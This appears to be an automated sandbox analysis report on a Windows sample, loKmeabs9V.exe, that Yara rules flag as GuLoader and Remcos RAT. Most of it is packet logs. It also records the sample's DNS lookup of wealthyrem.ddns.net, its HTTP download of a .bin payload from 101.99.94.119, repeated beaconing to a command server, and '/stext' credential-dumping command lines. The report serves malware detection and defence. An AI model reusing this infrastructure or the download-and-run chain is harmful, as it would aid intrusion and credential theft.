                              Aug 2, 2021 15:03:12.057121992 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057208061 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057254076 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057317972 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057322025 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057332039 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057374954 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057415962 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057456017 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057529926 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057538033 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057574034 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057629108 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057715893 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057753086 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057771921 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057811975 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057853937 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057917118 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057924032 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057940006 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058088064 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058104038 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058180094 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058214903 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058243036 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058250904 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058300018 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058348894 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058403015 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058454037 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058468103 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058478117 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058537006 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058608055 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058641911 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058696032 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058705091 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058712959 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058775902 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058815956 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058875084 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058933973 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058934927 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058938980 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059043884 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059111118 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059173107 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059220076 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059226990 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059258938 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059290886 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059331894 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059423923 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059484005 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059489012 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059499979 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059530020 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059572935 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059659004 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059674978 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059725046 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059732914 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.060544014 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060595989 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060657024 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060709000 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.060718060 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.060750961 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060822010 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060852051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060986996 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061047077 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061052084 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061063051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061146021 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061283112 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061333895 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061413050 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061440945 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061450005 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061494112 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061600924 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061609030 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.062792063 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062830925 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062858105 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062886000 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062927961 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062932968 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.063031912 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.063083887 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.063088894 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.063092947 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.063251019 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.063381910 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.068665028 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098331928 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098442078 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098464966 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098500967 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098512888 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098582029 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098604918 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098628998 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098644018 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098651886 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098650932 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098674059 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098753929 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098793983 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098795891 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098800898 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098925114 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099035978 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099086046 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099107981 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099134922 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099143982 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099200010 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099237919 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099314928 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099339008 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099359989 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099370003 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099406958 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099430084 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099679947 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099728107 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099735975 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099776030 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099798918 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099836111 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099965096 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099989891 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100018978 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100023031 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100033998 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100159883 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100213051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100235939 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100258112 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100265026 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100274086 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100315094 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100352049 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100363016 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100425005 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.101999998 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.111176014 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:15.596731901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:15.596860886 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:15.677026033 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:15.722158909 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:15.722244978 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:16.029788017 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:16.075258970 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:21.353677988 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:21.406029940 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:21.489300013 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:21.572326899 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:31.371530056 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:31.422549009 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:31.429145098 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:31.509607077 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:41.384546041 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:41.390964031 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:41.478131056 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:51.400068045 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:51.407814026 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:51.493704081 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:01.415540934 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:01.419898987 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:01.493447065 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:11.431567907 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:11.436808109 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:11.524528027 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:21.446342945 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:21.451208115 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:21.508649111 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:31.462131977 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:31.468518972 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:31.539814949 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:41.477227926 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:41.486490965 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:41.555200100 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:51.492645979 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:51.499546051 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:51.570686102 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:01.130698919 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:01.432708979 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:01.508057117 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:01.512989998 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:01.570427895 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:02.042085886 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:03.245723963 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:05.651741028 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:10.464749098 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:11.523772001 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:11.526886940 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:11.601669073 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:20.074856997 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:21.539102077 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:21.590699911 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:21.933423042 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:22.007736921 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:31.554419041 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:31.559030056 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:31.632371902 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:41.569895983 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:41.576601028 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:41.647880077 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:51.585360050 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:51.588793993 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:51.648979902 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:01.601159096 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:01.605078936 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:01.678889036 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:11.616298914 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:11.621671915 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:11.678539991 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:21.631577969 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:21.635173082 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:21.709731102 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:31.647075891 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:31.650868893 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:31.709690094 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:41.662970066 CEST3920049735194.5.97.128192.168.2.3

                              UDP Packets


                              DNS Queries

                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                              Aug 2, 2021 15:03:10.911448002 CEST | 192.168.2.3 | 8.8.8.8 | 0x89af | Standard query (0) | wealthyrem.ddns.net | A (IP address) | IN (0x0001)

                              DNS Answers

                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                              Aug 2, 2021 15:03:10.946295977 CEST | 8.8.8.8 | 192.168.2.3 | 0x89af | No error (0) | wealthyrem.ddns.net |  | 194.5.97.128 | A (IP address) | IN (0x0001)
                              Aug 2, 2021 15:05:57.866383076 CEST | 8.8.8.8 | 192.168.2.3 | 0x19b6 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net |  | CNAME (Canonical name) | IN (0x0001)

                              HTTP Request Dependency Graph

                              • 101.99.94.119

                              HTTP Packets

                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              0 | 192.168.2.3 | 49734 | 101.99.94.119 | 80 | C:\Users\user\Desktop\loKmeabs9V.exe

                              Timestamp | kBytes transferred | Direction | Data
                              Aug 2, 2021 15:03:10.036640882 CEST | 5267 | OUT | GET /WEALTH_PRUuqVZw139.bin HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Host: 101.99.94.119
                                  Cache-Control: no-cache
                              Aug 2, 2021 15:03:10.090718031 CEST | 5269 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 02 Aug 2021 05:03:09 GMT
                                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                                  Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT
                                  ETag: "72840-5c886c5bd2c84"
                                  Accept-Ranges: bytes
                                  Content-Length: 469056
                                  Content-Type: application/octet-stream


                              Code Manipulations

                              System Behavior

                              General

                              Start time: 15:01:09
                              Start date: 02/08/2021
                              Path: C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit): true
                              Commandline: 'C:\Users\user\Desktop\loKmeabs9V.exe'
                              Imagebase: 0x400000
                              File size: 114688 bytes
                              MD5 hash: E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: Visual Basic
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation: low

                              General

                              Start time: 15:02:09
                              Start date: 02/08/2021
                              Path: C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit): true
                              Commandline: 'C:\Users\user\Desktop\loKmeabs9V.exe'
                              Imagebase: 0x400000
                              File size: 114688 bytes
                              MD5 hash: E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, Author: Joe Security
                              Reputation: low

                              General

                              Start time: 15:03:11
                              Start date: 02/08/2021
                              Path: C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit): true
                              Commandline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
                              Imagebase: 0x400000
                              File size: 114688 bytes
                              MD5 hash: E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: low

                              General

                              Start time: 15:03:12
                              Start date: 02/08/2021
                              Path: C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit): true
                              Commandline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
                              Imagebase: 0x400000
                              File size: 114688 bytes
                              MD5 hash: E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: low

                              General

                              Start time: 15:03:13
                              Start date: 02/08/2021
                              Path: C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit): true
                              Commandline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
                              Imagebase: 0x400000
                              File size: 114688 bytes
                              MD5 hash: E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: low

                              Disassembly

                              Code Analysis


                                Executed Functions

                                APIs
                                • CreateProcessInternalW.KERNELBASE ref: 022B9A0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID: ;e=w$D5cI$Z[h]$\T$h%U$z22[
                                • API String ID: 2186235152-530423058
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessInternalW.KERNELBASE ref: 022B9A0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID: ;e=w$D5cI$Z[h]$\T$z22[
                                • API String ID: 2186235152-2234792939
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @USf$D5cI$Z[h]$`$h%U
                                • API String ID: 0-3812957336
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadMemoryProtectVirtual
                                • String ID: D5cI$Z[h]$h%U$wsc
                                • API String ID: 3389902171-2987000970
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 1029625771-4128129217
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 0-4128129217
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 0-4128129217
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 0-4128129217
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 022B7402: LoadLibraryA.KERNELBASE(EBE34479), ref: 022B75F0
                                • NtWriteVirtualMemory.NTDLL(?,0688E733,?,00000000,?,?,?,?,-C2E0AB5C), ref: 022B4FAB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadMemoryVirtualWrite
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 3569954152-4128129217
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 022B5971: NtAllocateVirtualMemory.NTDLL ref: 022B5AC2
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryProcessTerminateVirtual
                                • String ID: Qp a$SBTI
                                • API String ID: 2292769835-1817519146
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtWriteVirtualMemory.NTDLL(?,0688E733,?,00000000,?,?,?,?,-C2E0AB5C), ref: 022B4FAB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MemoryVirtualWrite
                                • String ID: D5cI$Z[h]
                                • API String ID: 3527976591-1924496853
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ProcessTerminate
                                • String ID: SBTI$]
                                • API String ID: 560597551-2907362054
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <s$tB%c$^
